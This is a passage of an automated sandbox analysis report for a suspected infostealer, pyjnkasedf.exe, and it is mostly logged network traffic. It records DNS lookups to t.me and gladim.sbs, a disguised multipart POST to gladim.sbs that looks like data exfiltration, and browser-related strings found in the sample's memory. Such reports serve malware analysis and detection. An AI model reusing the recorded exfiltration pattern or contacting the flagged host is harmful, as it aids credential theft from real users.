            Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
            Source: 000003.log3.15.drString found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
            Source: 000003.log3.15.drString found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
            Source: 000003.log3.15.drString found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
            Source: global trafficDNS traffic detected: DNS query: t.me
            Source: global trafficDNS traffic detected: DNS query: gladim.sbs
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
            Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
            Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
            Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
            Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
            Source: global trafficDNS traffic detected: DNS query: assets.msn.com
            Source: global trafficDNS traffic detected: DNS query: c.msn.com
            Source: global trafficDNS traffic detected: DNS query: api.msn.com
            Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHCBAEHJJJKKFIDGHJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: gladim.sbsContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
            Source: pyjnkasedf.exe, 00000000.00000002.2024724146.0000000003642000.00000004.00000020.00020000.00000000.sdmp, IDBKFH.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://assets.msn.cn/resolver/
            Source: 4dc7e5a3-b915-4af4-a840-9d0cb873b8e0.tmp.16.drString found in binary or memory: https://assets.msn.com
            Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://assets.msn.com/resolver/
            Source: e4931ed2-fe5c-4f76-8ed2-50603fc61b68.tmp.16.drString found in binary or memory: https://assets2.msn.com
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://bard.google.com/
            Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://bit.ly/wb-precache
            Source: pyjnkasedf.exe, 00000000.00000002.2023659585.000000000092E000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, HIDHIE.0.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700
            Source: pyjnkasedf.exe, 00000000.00000002.2023659585.000000000092E000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, HIDHIE.0.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta
            Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://browser.events.data.msn.cn/
            Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://browser.events.data.msn.com/
            Source: Reporting and NEL.16.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
            Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://c.msn.com/
            Source: pyjnkasedf.exe, 00000000.00000002.2024724146.0000000003642000.00000004.00000020.00020000.00000000.sdmp, IDBKFH.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: pyjnkasedf.exe, 00000000.00000002.2025435836.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000002.2024724146.0000000003642000.00000004.00000020.00020000.00000000.sdmp, AFHDHC.0.dr, Web Data.15.dr, IDBKFH.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: pyjnkasedf.exe, 00000000.00000002.2025435836.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000002.2024724146.0000000003642000.00000004.00000020.00020000.00000000.sdmp, AFHDHC.0.dr, Web Data.15.dr, IDBKFH.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: manifest.json.15.drString found in binary or memory: https://chrome.google.com/webstore/
            Source: manifest.json.15.drString found in binary or memory: https://chromewebstore.google.com/
            Source: e4931ed2-fe5c-4f76-8ed2-50603fc61b68.tmp.16.dr, 4dc7e5a3-b915-4af4-a840-9d0cb873b8e0.tmp.16.drString found in binary or memory: https://clients2.google.com
            Source: manifest.json0.15.drString found in binary or memory: https://clients2.google.com/service/update2/crx
            Source: e4931ed2-fe5c-4f76-8ed2-50603fc61b68.tmp.16.dr, 4dc7e5a3-b915-4af4-a840-9d0cb873b8e0.tmp.16.drString found in binary or memory: https://clients2.googleusercontent.com
            Source: pyjnkasedf.exe, 00000000.00000002.2023659585.000000000092E000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, HIDHIE.0.drString found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
            Source: pyjnkasedf.exe, 00000000.00000002.2023659585.000000000092E000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, HIDHIE.0.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: Reporting and NEL.16.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
            Source: manifest.json0.15.drString found in binary or memory: https://docs.google.com/
            Source: manifest.json0.15.drString found in binary or memory: https://drive-autopush.corp.google.com/
            Source: manifest.json0.15.drString found in binary or memory: https://drive-daily-0.corp.google.com/
            Source: manifest.json0.15.drString found in binary or memory: https://drive-daily-1.corp.google.com/
            Source: manifest.json0.15.drString found in binary or memory: https://drive-daily-2.corp.google.com/
            Source: manifest.json0.15.drString found in binary or memory: https://drive-daily-3.corp.google.com/
            Source: manifest.json0.15.drString found in binary or memory: https://drive-daily-4.corp.google.com/
            Source: manifest.json0.15.drString found in binary or memory: https://drive-daily-5.corp.google.com/
            Source: manifest.json0.15.drString found in binary or memory: https://drive-daily-6.corp.google.com/
            Source: manifest.json0.15.drString found in binary or memory: https://drive-preprod.corp.google.com/
            Source: manifest.json0.15.drString found in binary or memory: https://drive-staging.corp.google.com/
            Source: manifest.json0.15.drString found in binary or memory: https://drive.google.com/
            Source: pyjnkasedf.exe, 00000000.00000002.2025435836.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000002.2024724146.0000000003642000.00000004.00000020.00020000.00000000.sdmp, AFHDHC.0.dr, Web Data.15.dr, IDBKFH.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
